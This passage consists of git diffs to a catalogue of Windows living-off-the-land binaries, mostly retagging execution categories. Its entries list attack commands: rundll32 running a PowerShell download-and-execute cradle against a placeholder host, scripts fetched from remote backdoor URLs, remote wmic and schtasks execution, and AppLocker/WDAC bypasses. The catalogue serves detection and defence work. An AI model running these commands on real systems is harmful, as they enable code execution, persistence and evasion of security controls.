.NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 5d60b292..d1941d1e 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -22,15 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. - Usecase: Execute code from Internet - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript + - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -40,15 +32,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -75,8 +58,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - - Execute: DLL - - Execute: EXE + - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 535aeff5..330ae0da 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 82f9ab2b..a938e760 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 2fbd1f63..975c8316 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 27a9f125..7b12cf3c 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: CMD - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 3d0cdd57..2ab7e481 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index e42e6b74..55724dbf 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 49d52efc..5cb953cb 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -30,7 +30,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index e7d9b930..f7fbc3cc 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index e9ce1bd5..57a163a7 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index a96fe54f..b83e0e7e 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 6ee5a3f3..e75c0a68 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7514068c..52e973e9 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 29b58e9f..608f69d3 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 250f1009..a57f1b99 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 59a4a8c3..b23da74c 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 783eea71..963cf0ba 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -12,7 +12,6 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: EXE - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 10e39e50..7f71efb7 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 5e16964e..cb86feb9 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 5f0e1564..7e375cc0 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -32,8 +32,7 @@ Commands: MitreID: T1220 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD - - Execute: Remote + - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 40140642..23154c19 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 3517a54f..5e95bac2 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index bae245ee..2a158666 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index 61b19efd..a72e4b68 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 952594d7..f6f9eeae 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - - Execute: EXE + - Execute: CMD - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index eb613494..f54457e1 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 57de2447..16b369ed 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -30,7 +30,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed Tags: - - Execute: Fsharp + - Execute: FSharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -39,7 +39,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed Tags: - - Execute: CSProj + - Execute: CSharp Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index c770ad2a..6058ea53 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -21,7 +21,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 2a8f79c6..4241cbe4 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -21,7 +21,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index d39ab320..7090e1e7 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index aaa583e7..e495ef0d 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 44835607..b7c66aa0 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index 8cfa5433..622843c1 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Javascript + - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Javascript + - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index c0b51ae3..1dde3d0a 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -79,7 +79,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - - Execute: Nuget + - Execute: CMD - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. @@ -109,7 +109,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - - Execute: EXE + - Execute: CMD - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index ba2b6ba9..17136781 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 806df6d0..40dd2058 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Csharp + - Execute: XOML Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 11d34d9a..92970b54 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: wsl.exe --exec bash -c "" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. From b46fc3f8c242a44d5d0f3e65e81aaad1cda3a8fa Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 20 Nov 2024 23:24:00 +0000 Subject: [PATCH 148/148] Fixing issue with hh.yml --- yml/OSBinaries/Hh.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index fd09accc..27af482f 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -14,6 +14,8 @@ Commands: Tags: - Execute: EXE - Application: GUI + - Command: HH.exe c:\windows\system32\calc.exe + Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -22,6 +24,7 @@ Commands: Tags: - Execute: EXE - Application: GUI + - Command: HH.exe http://some.url/payload.chm Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute